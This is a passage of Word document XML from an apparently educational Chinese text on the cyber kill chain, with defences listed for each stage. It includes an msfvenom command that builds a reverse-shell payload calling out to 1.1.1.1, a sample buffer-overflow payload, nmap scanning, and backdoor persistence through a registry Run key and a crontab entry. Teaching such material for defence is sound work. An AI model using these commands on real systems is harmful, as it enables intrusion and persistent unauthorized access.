        <w:t>端口扫描（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nmap -sV 192.168.1.0/24</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3622AC6D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>员工信息挖掘（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>LinkedIn/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>社交媒体）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3DA67D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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372901E5" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>限制公开信息（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WHOIS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐私保护）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3A8B07" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏蔽扫描行为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF46768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 xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>武器化</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Weaponization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2FCEC7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目标：制作攻击载体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1CABDE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工具示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA3BFD" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>恶意文档生成：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSFVenom -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 -f docx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDC38AA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>免杀木马：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Veil-Evasion/Shellter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A76D734" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>钓鱼页面：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Gophish</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2AD310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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFD93E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>邮件附件沙箱检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096DDD7E" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>终端防病毒软件（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>EDR</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D6E691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 xml:space="preserve">3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>交付</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Delivery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D582092" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Hlk200637846"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击渠道</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E636FE" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>STYLEREF 1 \s</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/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 w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve">SEQ </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText>表</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> \* ARABIC \s 1</w:instrText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/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>攻击渠道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237"/>
        <w:gridCol w:w="5607"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="4155B8DF" w14:textId="77777777" w:rsidTr="00501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2D8595C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类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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0E8E2E8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案例</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="29AB2AAB" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1830" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="10A224A6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rFonts w:cs="Times New Roman"/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cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>钓鱼邮件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3170" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="37649B6B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伪装成发票的恶意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Excel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文件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="3057F119" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1830" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2690B0F3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rFonts w:cs="Times New Roman"/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恶意网站</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3170" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17E1110D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虚假登录页窃取凭据</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="7FDE347F" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1830" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="38C90999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USB</w:t>
            </w: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摆渡攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3170" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1382114B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丢弃的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"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工资单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"U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盘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A00E83" w:rsidRPr="00A00E83" w14:paraId="72DC5598" w14:textId="77777777" w:rsidTr="00501C99">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1830" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0A90EC91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供应链攻击</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3170" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74D03709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SolarWinds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后门事件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09CC95D8" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00A00E83">
      <w:pPr>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:before="60" w:after="60" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0" w:firstLine="360"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="089D290F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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103CD0A9" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>员工安全意识培训</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D9D51" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网页内容过滤（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过滤）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7328EF8F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 xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Exploitation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047B3791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漏洞利用技术：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060F5779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 xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>缓冲区溢出攻击示例</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159B6D5D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 xml:space="preserve">payload = b"A"*1000 + b"\x90\x83\x04\x08"  # </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>覆盖返回地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF494D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>send_to_target(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736BD182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主流工具：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A514D75" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：超过</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个漏洞利用模块</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C154443" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：自动化</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入工具</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E8B87A" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Burp Suite</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F9D6CB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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B2059C" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>及时打补丁（</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows Update</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8DFFAC" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>规则更新（防止</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OWASP Top 10</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759646B1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 xml:space="preserve">5. </w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Installation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2122F302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持久化手段：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D14D32" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：注册表自启动项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8B5D37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>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0983EFF5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>"Backdoor"="C:\malware.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25994FEA" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>crontab</w:t>
      </w:r>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定时任务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B898C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>* * * * * /tmp/.hidden/backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF8628D" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>内存驻留：无文件攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E998E2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防御措施：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9AF1E3" w14:textId="77777777" w:rsidR="00A00E83" w:rsidRPr="00A00E83" w:rsidRDefault="00A00E83" w:rsidP="00854AE1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A00E83">
        <w:rPr>
